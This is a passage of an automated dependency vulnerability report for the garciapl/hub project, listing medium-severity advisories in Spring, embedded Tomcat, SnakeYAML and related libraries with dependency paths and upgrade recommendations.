Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE

…and 24 more

Overview

org.springframework:spring-core is a core package within the spring-framework that contains multiple classes and utilities.

Affected versions of this package are vulnerable to Multipart Content Pollution. It provides client-side support for multipart requests. When the server application (server A) receives input from a remote client, and then uses that input to make a multipart request to another server (server B), it can be exposed to an attack, where an extra multipart is inserted in the content of the request from server A, causing server B to use the wrong value for a part it expects. This could to lead privilege escalation, for example, if the part content represents a username or user roles.

Remediation

Upgrade org.springframework:spring-core to version 4.3.14.RELEASE, 5.0.5.RELEASE or higher.

References

Multipart Content Pollution vulnerability report

medium severity

HTTP Request Smuggling

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.17.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.17.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling. If an HTTP/2 client connecting to Apache Tomcat exceeded the agreed maximum number of concurrent streams for a connection (in violation of the HTTP/2 protocol), it was possible that a subsequent request made on that connection could contain HTTP headers - including HTTP/2 pseudo headers - from a previous request rather than the intended headers. This could lead to users seeing responses for unexpected resources.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M8, 9.0.38, 8.5.58 or higher.

References

HTTP Request Smuggling vulnerability report

medium severity

Open Redirect

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.16.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@1.5.16.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Open Redirect. When the default servlet returned a redirect to a directory (e.g. redirecting to '/foo/' when the user requested '/foo') a specially crafted URL could be used to cause the redirect to be generated to any URI of the attackers choice.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 7.0.91, 8.5.34, 9.0.12 or higher.

References

Open Redirect vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: org.yaml:snakeyaml
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.yaml:snakeyaml@1.17

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.0.RELEASE.

Overview

org.yaml:snakeyaml is a YAML 1.1 parser and emitter for Java.

Affected versions of this package are vulnerable to Denial of Service (DoS). The Alias feature in SnakeYAML 1.18 allows entity expansion during a load operation, a related issue to CVE-2003-1564.

Note While the Maintainer acknowledges the existence of the issue, they believe it should be solved by sanitizing the inputStream to the parser

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.yaml:snakeyaml to version 1.26 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

Improper Input Validation

Vulnerable module: org.apache.httpcomponents:httpclient
Introduced through: org.apache.httpcomponents:httpclient@4.5.3

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.apache.httpcomponents:httpclient@4.5.3

Remediation: Upgrade to org.apache.httpcomponents:httpclient@4.5.13.

Overview

org.apache.httpcomponents:httpclient is a HttpClient component of the Apache HttpComponents project.

Affected versions of this package are vulnerable to Improper Input Validation. Apache HttpClient can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.

Remediation

Upgrade org.apache.httpcomponents:httpclient to version 4.5.13 or higher.

References

Improper Input Validation vulnerability report

medium severity

Denial of Service (DoS)

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.16.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.1.16.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Denial of Service (DoS). An h2c direct connection did not release the HTTP/1.1 processor after the upgrade to HTTP/2. If a sufficient number of such requests are made, an OutOfMemoryException could occur leading to a denial of service.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M7, 9.0.37, 8.5.57 or higher.

References

Denial of Service (DoS) vulnerability report

medium severity

HTTP Request Smuggling

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.8.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.4.8.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to HTTP Request Smuggling. Tomcat does not correctly parse the HTTP transfer-encoding request header in some circumstances, leading to the possibility of request smuggling when used with a reverse proxy.

Specifically, Tomcat incorrectly ignores the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; it honours the identify encoding; and it does not ensure that, if present, the chunked encoding was the final encoding.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.7, 9.0.48, 8.5.68 or higher.

References

HTTP Request Smuggling vulnerability report

medium severity

Improper Input Validation

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation due to the improper handling of HTTP trailer headers. An attacker can manipulate the server into treating a single request as multiple requests by sending a specially crafted, invalid trailer header. This could lead to request smuggling when the server is behind a reverse proxy.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

Improper Input Validation vulnerability report

medium severity

Incomplete Cleanup

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.7.17.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Incomplete Cleanup when recycling various internal objects. An error could cause some parts of the recycling process to be skipped, leading to information leaking from the current request/response to the next. An attacker can gain unauthorised access to sensitive information by exploiting this error.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.94, 9.0.81, 10.1.14, 11.0.0-M12 or higher.

References

Incomplete Cleanup vulnerability report

medium severity

Information Disclosure

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Disclosure. When serving resources from a network location using the NTFS file system, affected versions were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.0-M10, 9.0.40, 8.5.60, 7.0.107 or higher.

References

Information Disclosure vulnerability report

medium severity

Information Exposure

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.2.12.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure. An HTTP request header value could be reused from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.60, 9.0.40, 10.0.0-M10 or higher.

References

Information Exposure vulnerability report

medium severity

Information Exposure

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.10.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Information Exposure through an incomplete POST request, which triggers an error response that could contain data from a previous request from another user.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.64, 9.0.44, 10.0.4 or higher.

References

Information Exposure vulnerability report

medium severity

Unprotected Transport of Credentials

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.15.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Unprotected Transport of Credentials when using the RemoteIpFilter with requests received from a reverse proxy via HTTP, in which the X-Forwarded-Proto header is set to https. Session cookies do not include the secure attribute, so the user agent may transmit the session cookie over an insecure channel.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 8.5.86, 9.0.72, 10.1.6, 11.0.0-M3 or higher.

References

Unprotected Transport of Credentials vulnerability report

medium severity

Improper Input Validation

Vulnerable module: org.hibernate:hibernate-validator
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.hibernate:hibernate-validator@5.3.6.Final

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.0.0.RELEASE.

Overview

org.hibernate:hibernate-validator is a Hibernate Validator Engine Relocation Artifact.

Affected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.

Remediation

Upgrade org.hibernate:hibernate-validator to version 6.0.19.Final, 6.1.3.Final or higher.

References

Improper Input Validation vulnerability report

medium severity

Improper Input Validation

Vulnerable module: org.apache.tomcat.embed:tomcat-embed-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.11.RELEASE.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter-tomcat@1.5.9.RELEASE › org.apache.tomcat.embed:tomcat-embed-websocket@8.5.23 › org.apache.tomcat.embed:tomcat-embed-core@8.5.23

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.3.11.RELEASE.

Overview

org.apache.tomcat.embed:tomcat-embed-core is a Core Tomcat implementation.

Affected versions of this package are vulnerable to Improper Input Validation. Queries made by the JNDI Realm did not always correctly escape parameters. Parameter values could be sourced from user provided data (e.g., user names) as well as configuration data provided by an administrator. In limited circumstances it was possible for users to authenticate using variations of their user name and/or to bypass some of the protection provided by the LockOut Realm.

Remediation

Upgrade org.apache.tomcat.embed:tomcat-embed-core to version 10.0.6, 9.0.46, 8.5.66, 7.0.109 or higher.

References

Improper Input Validation vulnerability report

medium severity

Improper Input Validation

Vulnerable module: org.springframework:spring-core
Introduced through: org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE

Detailed paths

Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.8.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.8.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-web@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-core@4.3.13.RELEASE

Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@2.5.8.
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework:spring-webmvc@7.0.0-M4 › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-expression@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot-autoconfigure@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
Introduced through: garciapl/hub@garciapl/hub#ec53d61d0601d3ae4128caf943f4333f907631a4 › org.springframework.boot:spring-boot-starter-web@1.5.9.RELEASE › org.springframework.boot:spring-boot-starter@1.5.9.RELEASE › org.springframework.boot:spring-boot@1.5.9.RELEASE › org.springframework:spring-context@7.0.0-M4 › org.springframework:spring-aop@7.0.0-M4 › org.springframework:spring-beans@7.0.0-M4 › org.springframework:spring-core@4.3.13.RELEASE
